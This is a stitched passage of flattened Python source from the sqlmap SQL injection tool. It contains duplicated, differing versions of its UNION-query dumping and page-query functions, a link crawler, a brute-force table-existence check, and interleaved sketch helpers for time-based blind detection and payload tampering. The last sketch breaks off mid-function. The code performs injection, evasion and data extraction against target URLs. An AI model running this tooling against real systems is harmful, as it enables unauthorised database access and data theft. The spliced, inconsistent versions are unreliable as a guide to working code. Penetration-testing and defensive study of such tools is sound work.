url = "http://%s:%d/?id=1" % (address, port) direct = "sqlite3://%s" % database for options, checks in TESTS: status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) cmd = "%s %s %s --batch" % (sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options.replace("<url>", url).replace("<direct>", direct).replace("<request>", request).replace("<log>", log)) output = shellExec(cmd) if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks): dataToStdout("---\n\n$ %s\n" % cmd) dataToStdout("%s---\n" % clearColors(output)) retVal = False count += 1 clearConsoleLine() if retVal: logger.info("vuln test final result: PASSED") else: logger.error("vuln test final result: FAILED") return retVal
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target URL then call its subsidiary function to effectively perform an union SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) # We have to check if the SQL query might return multiple entries # if the technique is partial UNION query and in such case forge the # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = unArrayizeValue(parseUnionPage(output)) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif (not count or int(count) == 0): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() threadData.shared.buffered = [] threadData.shared.lastFlushed = startLimit - 1 if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. 
It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): items = parseUnionPage(output) with kb.locks.value: # in case that we requested N columns and we get M!=N then we have to filter a bit if isListLike(items) and len(items) > 1 and len(expressionFieldsList) > 1: items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, items)) while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]: threadData.shared.lastFlushed += 1 _ = threadData.shared.buffered[0][1] if not isNoneValue(_): threadData.shared.value.extend(arrayizeValue(_)) del threadData.shared.buffered[0] else: with kb.locks.value: index = None for index in xrange(len(threadData.shared.buffered)): if threadData.shared.buffered[index][0] >= num: break threadData.shared.buffered.insert(index or 0, (num, None)) items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: for _ in sorted(threadData.shared.buffered): if not isNoneValue(_[1]): threadData.shared.value.extend(arrayizeValue(_[1])) value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) value = parseUnionPage(output) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST, PLACE.URI): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ('?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', '>').replace('<', '<') value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: origValue = conf.parameters[item] if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) get = urlencode(get, limit=True) if post and place != PLACE.POST and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) else: post = urlencode(post) 
if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging (standard deviation: " warnMsg += "%.1f sec%s) " % (deviation, "s" if deviation > 1 else "") warnMsg += "in connection response(s). Please use as high " warnMsg += "value for --time-sec option as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
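# --- Rough sketch of the statistics behind the time-based checks above: collect a
# --- baseline of response times, warn when their spread is large, and treat a request
# --- as "delayed" when it exceeds the baseline mean by a few standard deviations.
# --- The threshold constants here are illustrative assumptions, not sqlmap's values.
import statistics

def is_delayed(baseline_times, observed, k=3.0):
    mean = statistics.mean(baseline_times)
    deviation = statistics.stdev(baseline_times) if len(baseline_times) > 1 else 0.0
    return observed >= mean + k * max(deviation, 0.01)

# baseline = [0.21, 0.25, 0.23, 0.22, 0.26]
# print(is_delayed(baseline, 5.3))   # True: clearly slower than the baseline
# print(is_delayed(baseline, 0.24))  # False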
def unionUse(expression, unpack=True, dump=False): """ This function tests for an union SQL injection on the target url then call its subsidiary function to effectively perform an union SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) if expressionFieldsList and len(expressionFieldsList) > 1 and " ORDER BY " in expression.upper(): # No need for it in multicolumn dumps (one row is retrieved per request) and just slowing down on large table dumps expression = expression[:expression.upper().rindex(" ORDER BY ")] # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry per time # NOTE: I assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop))) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I) topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I) if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): if limitRegExp: limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif topLimit: startLimit = 0 stopLimit = int(topLimit.group(1)) limitCond = int(stopLimit) > 1 elif Backend.isDbms(DBMS.ORACLE): limitCond = False else: limitCond = True # I assume that only queries NOT containing a "LIMIT #, 1" # (or similar depending on the back-end DBMS) can return # multiple entries if limitCond: if limitRegExp: stopLimit = int(stopLimit) # From now on we need only the expression until the " LIMIT " # (or similar, depending on the back-end DBMS) word if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): stopLimit += startLimit untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) expression = expression[:untilLimitChar] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): stopLimit += startLimit elif dump: if conf.limitStart: startLimit = conf.limitStart - 1 if conf.limitStop: stopLimit = conf.limitStop # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % ('*' if len(expressionFieldsList) > 1 
else expressionFields), 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = _oneShotUnionUse(countedExpression, unpack) count = parseUnionPage(output) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif not count or int(count) == 0: if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limits: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = _oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda x: x in output, [kb.chars.start, kb.chars.stop])): items = parseUnionPage(output) if isNoneValue(items): continue with kb.locks.value: for item in arrayizeValue(items): threadData.shared.value.append(item) else: items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY value = _oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
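# --- Illustrative sketch (not sqlmap's exact limitregexp queries) of how a LIMIT/TOP
# --- clause can be parsed into startLimit/stopLimit, as done above before dumping a
# --- partial UNION result one row at a time.
import re

def parse_limits(expression):
    start, stop = 0, None
    match = re.search(r"(?i)\bLIMIT\s+(\d+)\s*,\s*(\d+)", expression)  # MySQL "LIMIT start, count"
    if match:
        start = int(match.group(1))
        stop = start + int(match.group(2))
        return start, stop
    match = re.search(r"(?i)\bTOP\s+(\d+)\b", expression)              # MSSQL/Sybase "TOP n"
    if match:
        stop = int(match.group(1))
    return start, stop

# print(parse_limits("SELECT name FROM users LIMIT 10, 5"))  # (10, 15)
# print(parse_limits("SELECT TOP 3 name FROM users"))        # (0, 3)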
def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = OrderedSet() def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue elif conf.crawlExclude and re.search(conf.crawlExclude, current): dbgMsg = "skipping '%s'" % current logger.debug(dbgMsg) continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException as ex: errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) except SqlmapSyntaxException: errMsg = "invalid URL detected. skipping '%s'" % current logger.critical(errMsg) except _http_client.InvalidURL as ex: errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex) errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, six.text_type): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') tags += re.finditer(r'(?i)<a[^>]+href=["\'](?P<href>[^>"\']+)', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = _urllib.parse.urljoin(current, htmlUnescape(href)) # flag to know if we are dealing with the same target host _ = checkSameHost(url, target) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass except ValueError: # for non-valid links pass finally: if conf.forms: findPageForms(content, current, False, True) if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) if not conf.sitemapUrl: message = "do you want to check for the existence of " message += "site's sitemap(.xml) [y/N] " if readInput(message, default='N', boolean=True): found = True items = None url = _urllib.parse.urljoin(target, "/sitemap.xml") try: items = parseSitemap(url) except SqlmapConnectionException as ex: if "page not found" in getSafeExString(ex): found = False logger.warn("'sitemap.xml' not found") except: pass finally: if found: if items: for item in items: if re.search(r"(.*?)\?(.+)", item): threadData.shared.value.add(item) if conf.crawlDepth > 1: threadData.shared.unprocessed.update(items) logger.info("%s links found" % ("no" if not items else len(items))) infoMsg = "starting crawler" if conf.bulkFile: infoMsg += " for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: 
logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) storeResultsToFile(kb.targets)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None page = None pageLength = None uri = None raise404 = place != PLACE.URI if raise404 is None else raise404 if not place: place = kb.injection.place payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(9, payload) if place == PLACE.COOKIE and conf.cookieUrlencode: value = agent.removePayloadDelimiters(value) value = urlEncodeCookieValues(value) elif place: if place in (PLACE.GET, PLACE.POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char payload = urlencode(payload, "%", False, True) value = agent.replacePayload(value, payload) value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True) if PLACE.POST in conf.parameters: post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value) if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." 
logger.warn(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if content or response: return page, headers page = removeReflectiveValues(page, payload) if getRatioValue: return comparison(page, getRatioValue=False, pageLength=pageLength), comparison(page, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, getRatioValue, pageLength) else: return False
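# --- Minimal sketch of the tamper-function chain applied to the payload above: each
# --- tamper callable takes a payload string and returns a modified one, and they are
# --- applied in order. The two sample tampers are simplified illustrations, not
# --- sqlmap's bundled tamper scripts.
def space2comment(payload):
    return payload.replace(" ", "/**/")

def uppercase_keywords(payload):
    return payload.upper()

def apply_tampers(payload, tamper_functions):
    for function in tamper_functions:
        payload = function(payload)
    return payload

# print(apply_tampers("' OR 1=1--", (space2comment, uppercase_keywords)))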
def tableExists(tableFile, regex=None): result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) if result: errMsg = "can't use table existence check because of detected invalid results " errMsg += "(most probably caused by inability of the used injection " errMsg += "to distinguish errornous results)" raise sqlmapDataException, errMsg tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS, ), unique=True) infoMsg = "checking table existence using items from '%s'" % tableFile logger.info(infoMsg) tables.extend(__addPageTextWords()) tables = filterListValue(tables, regex) threadData = getCurrentThreadData() threadData.shared.count = 0 threadData.shared.limit = len(tables) threadData.shared.outputs = [] threadData.shared.unique = set() def tableExistsThread(): threadData = getCurrentThreadData() while kb.threadContinue: kb.locks.count.acquire() if threadData.shared.count < threadData.shared.limit: table = safeSQLIdentificatorNaming( tables[threadData.shared.count], True) threadData.shared.count += 1 kb.locks.count.release() else: kb.locks.count.release() break if conf.db and METADB_SUFFIX not in conf.db: fullTableName = "%s%s%s" % ( conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) else: fullTableName = table result = inject.checkBooleanExpression( "%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) kb.locks.io.acquire() if result and table.lower() not in threadData.shared.unique: threadData.shared.outputs.append(table) threadData.shared.unique.add(table.lower()) if conf.verbose in (1, 2): clearConsoleLine(True) infoMsg = "[%s] [INFO] retrieved: %s\r\n" % ( time.strftime("%X"), table) dataToStdout(infoMsg, True) if conf.verbose in (1, 2): status = '%d/%d items (%d%s)' % ( threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit), '%') dataToStdout( "\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) kb.locks.io.release() try: runThreads(conf.threads, tableExistsThread, threadChoice=True) except KeyboardInterrupt: warnMsg = "user aborted during table existence " warnMsg += "check. sqlmap will display partial output" logger.warn(warnMsg) clearConsoleLine(True) dataToStdout("\n") if not threadData.shared.outputs: warnMsg = "no table(s) found" logger.warn(warnMsg) else: for item in threadData.shared.outputs: if conf.db not in kb.data.cachedTables: kb.data.cachedTables[conf.db] = [item] else: kb.data.cachedTables[conf.db].append(item) for _ in map(lambda x: (conf.db, x), threadData.shared.outputs): if _ not in kb.brute.tables: kb.brute.tables.append(_) hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) return kb.data.cachedTables
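# --- Schematic version (assumptions only, no sqlmap internals) of the brute-force
# --- probe used by tableExists() above: a boolean "oracle" answers
# --- EXISTS(SELECT ... FROM <table>) truthfully, a probe against a random table name
# --- guards against an oracle that always answers True, and each wordlist candidate
# --- is then tested in turn.
import random
import string

def brute_tables(check, wordlist):
    # check(expression) -> bool is the injected boolean oracle (assumed to be given)
    junk = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
    if check("EXISTS(SELECT 1 FROM %s)" % junk):
        raise RuntimeError("oracle returns invalid (always-true) results")
    found = []
    for table in wordlist:
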